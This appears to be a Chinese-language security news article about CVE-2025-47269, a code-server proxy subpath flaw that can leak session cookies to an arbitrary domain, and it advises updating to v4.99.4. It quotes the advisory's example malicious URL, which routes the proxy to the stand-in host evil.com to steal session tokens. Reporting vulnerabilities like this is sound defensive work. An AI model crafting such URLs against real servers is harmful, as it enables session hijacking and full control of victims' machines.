最新披露的安全公告揭示了广受欢迎的代码服务器项目中的一个漏洞,该项目允许用户在浏览器中运行 VS Code。该漏洞编号为 CVE-2025-47269,CVSS 评分为 8.3,可能允许攻击者未经授权访问用户会话。
code-server 是一个备受推崇的项目,在 GitHub 上拥有超过 71,000 个 star,它让开发者能够灵活地在任何机器上运行 VS Code,并通过 Web 浏览器访问。然而,这种便捷性也伴随着安全方面的考虑。
核心问题在于proxy代码服务器的子路径功能。正如安全公告所解释的那样,“使用子路径恶意构建的 URLproxy可能导致攻击者获得会话令牌的访问权限。”
该漏洞源于对代理请求端口缺乏适当的验证。此漏洞允许攻击者操纵 URL,从而导致代码服务器将连接代理到任意域名。
该公告提供了一个清晰的示例:“恶意 URLhttps://<code-server>/proxy/test@evil.com/path将被代理到test@evil.com/path攻击者可以窃取用户会话令牌的地方。”
本质上,虽然代理功能旨在访问本地端口,但攻击者可以构造一个 URL,将代理重定向到他们自己的恶意服务器。当用户点击此类链接时,他们的会话 Cookie 会被无意中发送到攻击者的服务器。安全公告指出:“通常情况下,这用于代理本地端口,但 URL 可以指向攻击者的域名,然后将连接代理到该域名,这将包括发送 Cookie。”
该漏洞的后果非常严重。通过获取用户的会话cookie,攻击者可以有效绕过身份验证,并完全控制代码服务器实例。
正如该公告所强调的,“通过访问会话 cookie,攻击者可以登录代码服务器,并以运行代码服务器的用户身份完全访问托管代码服务器的计算机。”这意味着攻击者可能会读取、修改或删除文件,安装恶意软件或在服务器上执行其他恶意操作。
幸运的是,目前已有补丁可以修复此漏洞。强烈建议 code-server 用户尽快更新至最新版本(v 4.99.4或更高版本),以防范此严重安全风险。
发表评论
您还未登录,请先登录。
登录